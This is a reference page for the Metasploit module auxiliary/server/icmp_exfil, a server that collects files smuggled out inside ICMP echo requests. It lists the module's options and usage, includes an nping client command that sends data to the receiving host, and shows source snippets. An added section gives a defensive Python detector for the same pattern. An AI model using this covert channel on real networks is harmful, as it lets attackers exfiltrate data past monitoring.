ICMP Exfiltration Service - Metasploit


This page contains detailed information about how to use the auxiliary/server/icmp_exfil Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ICMP Exfiltration Service
Module: auxiliary/server/icmp_exfil
Source code: modules/auxiliary/server/icmp_exfil.rb
Disclosure date: -
Last modification time: 2017-10-31 04:53:14 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module is designed to provide a server-side component to receive and store files exfiltrated over ICMP echo request packets. To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF'); this can be followed by the filename being sent (or a random filename can be assigned). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (the description says '^EOL', while the END_TRIGGER option listed below defaults to '^EOF') is received. Suggested client: data can be sent from the client using a variety of tools. One such example is nping (included with the Nmap suite of tools); usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1
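As an added example (not part of this page or of the module's own code), the following Python detector replays the BOF/EOF state machine described above over ICMP echo request payloads, so a defender can flag this transfer pattern in a capture. It assumes the triggers are regular expressions anchored at the start of the payload (as the '^' suggests), takes the trigger defaults from the option table, and the sample packets are constructed.

```python
import re
import struct

# Trigger defaults from the module's option table (constructed detector, not module code).
START_TRIGGER = re.compile(rb"^BOF")
END_TRIGGER = re.compile(rb"^EOF")

def icmp_payload(frame: bytes):
    # Return (src_ip, payload) for an IPv4 ICMP echo request, otherwise None.
    if len(frame) < 20 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None
    ihl = (frame[0] & 0x0F) * 4
    if len(frame) < ihl + 8 or frame[ihl] != 8 or frame[ihl + 1] != 0:
        return None  # only type 8 / code 0 echo requests carry data to the server
    src = ".".join(str(b) for b in frame[12:16])
    return src, frame[ihl + 8:]

def detect_transfers(frames):
    # Replay the module's per-source BOF/EOF state machine and report completed transfers.
    buffers = {}   # src -> [filename, bytearray] while a transfer is open
    findings = []
    for frame in frames:
        parsed = icmp_payload(frame)
        if parsed is None:
            continue
        src, data = parsed
        start = START_TRIGGER.match(data)
        if start:  # payload after the trigger is the filename (FNAME_IN_PACKET)
            buffers[src] = [data[start.end():].decode(errors="replace") or "<unnamed>", bytearray()]
        elif END_TRIGGER.match(data) and src in buffers:
            name, buf = buffers.pop(src)
            findings.append({"src": src, "filename": name, "bytes": len(buf)})
        elif src in buffers:
            buffers[src][1].extend(data)
    return findings

def build_echo_request(src: str, payload: bytes) -> bytes:
    # Constructed IPv4 + ICMP echo request; checksums left at zero, the parser ignores them.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")), bytes([10, 0, 0, 1]))
    return ip + struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + payload

# Constructed sample capture: one exfiltration of "test.txt" interleaved with a normal ping.
SAMPLE = [build_echo_request("10.0.0.50", b"BOFtest.txt"),
          build_echo_request("10.0.0.50", b"secret line 1\n"),
          build_echo_request("10.0.0.7", b"abcdefghijklmnop"),
          build_echo_request("10.0.0.50", b"secret line 2\n"),
          build_echo_request("10.0.0.50", b"EOF")]
```

Running detect_transfers(SAMPLE) reports one completed transfer from 10.0.0.50 named "test.txt" carrying 28 bytes, while the unrelated ping from 10.0.0.7 is ignored; feeding real frames from a pcap reader in place of SAMPLE gives a quick triage check for this pattern.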

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/server/icmp_exfil
msf auxiliary(icmp_exfil) > show targets
    ... a list of targets ...
msf auxiliary(icmp_exfil) > set TARGET target-id
msf auxiliary(icmp_exfil) > show options
    ... show and set options ...
msf auxiliary(icmp_exfil) > exploit


Msfconsole Usage


Here is how the server/icmp_exfil auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/icmp_exfil

msf6 auxiliary(server/icmp_exfil) > show info

       Name: ICMP Exfiltration Service
     Module: auxiliary/server/icmp_exfil
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Chris John Riley

Check supported:
  No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  BPF_FILTER       icmp             yes       BFP format filter to listen for
  END_TRIGGER      ^EOF             yes       Trigger for end of file
  FNAME_IN_PACKET  true             yes       Filename presented in first packet straight after START_TRIGGER
  INTERFACE                         no        The name of the interface
  RESP_CONT        OK               yes       Data ro resond when continuation of data expected
  RESP_END         COMPLETE         yes       Data to response when EOF received and data saved
  RESP_START       SEND             yes       Data to respond when initial trigger matches
  START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Description:
  This module is designed to provide a server-side component to 
  receive and store files exfiltrated over ICMP echo request packets. 
  To use this module you will need to send an initial ICMP echo 
  request containing the specific start trigger (defaults to '^BOF') 
  this can be followed by the filename being sent (or a random 
  filename can be assigned). All data received from this source will 
  automatically be added to the receive buffer until an ICMP echo 
  request containing a specific end trigger (defaults to '^EOL') is 
  received. Suggested Client: Data can be sent from the client using a 
  variety of tools. One such example is nping (included with the NMAP 
  suite of tools) - usage: nping --icmp 10.0.0.1 --data-string 
  "BOFtest.txt" -c1

References:
  https://github.com/todb/packetfu
  http://nmap.org/book/nping-man.html
  http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/

Module Options


This is a complete list of options available in the server/icmp_exfil auxiliary module:

msf6 auxiliary(server/icmp_exfil) > show options

Module options (auxiliary/server/icmp_exfil):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BPF_FILTER       icmp             yes       BFP format filter to listen for
   END_TRIGGER      ^EOF             yes       Trigger for end of file
   FNAME_IN_PACKET  true             yes       Filename presented in first packet straight after START_TRIGGER
   INTERFACE                         no        The name of the interface
   RESP_CONT        OK               yes       Data ro resond when continuation of data expected
   RESP_END         COMPLETE         yes       Data to response when EOF received and data saved
   RESP_START       SEND             yes       Data to respond when initial trigger matches
   START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Advanced Options


Here is a complete list of advanced options supported by the server/icmp_exfil auxiliary module:

msf6 auxiliary(server/icmp_exfil) > show advanced

Module advanced options (auxiliary/server/icmp_exfil):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CLOAK      linux            yes       OS fingerprint to use for packet creation (Accepted: windows, linux, freebsd)
   LOCALIP                     no        The IP address of the local interface
   PROMISC    false            yes       Enable/Disable promiscuous mode
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the server/icmp_exfil module can do:

msf6 auxiliary(server/icmp_exfil) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the server/icmp_exfil auxiliary module, used to evade defenses such as antivirus, EDR, firewalls and NIDS:

msf6 auxiliary(server/icmp_exfil) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

WARNING : Pcaprub is not uptodate, some functionality will not be available


Here is a relevant code snippet related to the "WARNING : Pcaprub is not uptodate, some functionality will not be available" error message:

  def run
    begin
      # check Pcaprub is up to date
      if not netifaces_implemented?
        print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available")
        netifaces = false
      else
        netifaces = true
      end

Dectected ICMP echo response. You must either disable ICMP handling


Here is a relevant code snippet related to the "Dectected ICMP echo response. You must either disable ICMP handling" error message:

          # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
          # -(Windows) netsh firewall set icmpsetting 8 disable
          # -(Windows) netsh firewall set opmode mode = ENABLE

          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
            print_error "or try a more restrictive BPF filter. You might try:"
            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
            return
          end

or try a more restrictive BPF filter. You might try


Here is a relevant code snippet related to the "or try a more restrictive BPF filter. You might try" error message:

          # -(Windows) netsh firewall set icmpsetting 8 disable
          # -(Windows) netsh firewall set opmode mode = ENABLE

          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
            print_error "or try a more restrictive BPF filter. You might try:"
            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
            return
          end

          if @record

set BPF_FILTER icmp and not src <LOCALIP>


Here is a relevant code snippet related to the "set BPF_FILTER icmp and not src <LOCALIP>" error message:

          # -(Windows) netsh firewall set opmode mode = ENABLE

          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
            print_error "or try a more restrictive BPF filter. You might try:"
            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
            return
          end

          if @record
            print_error("New file started without saving old data")

New file started without saving old data


Here is a relevant code snippet related to the "New file started without saving old data" error message:

            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
            return
          end

          if @record
            print_error("New file started without saving old data")
            store_file
          end

          # begin recording stream
          @record = true



Authors


Chris John Riley

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
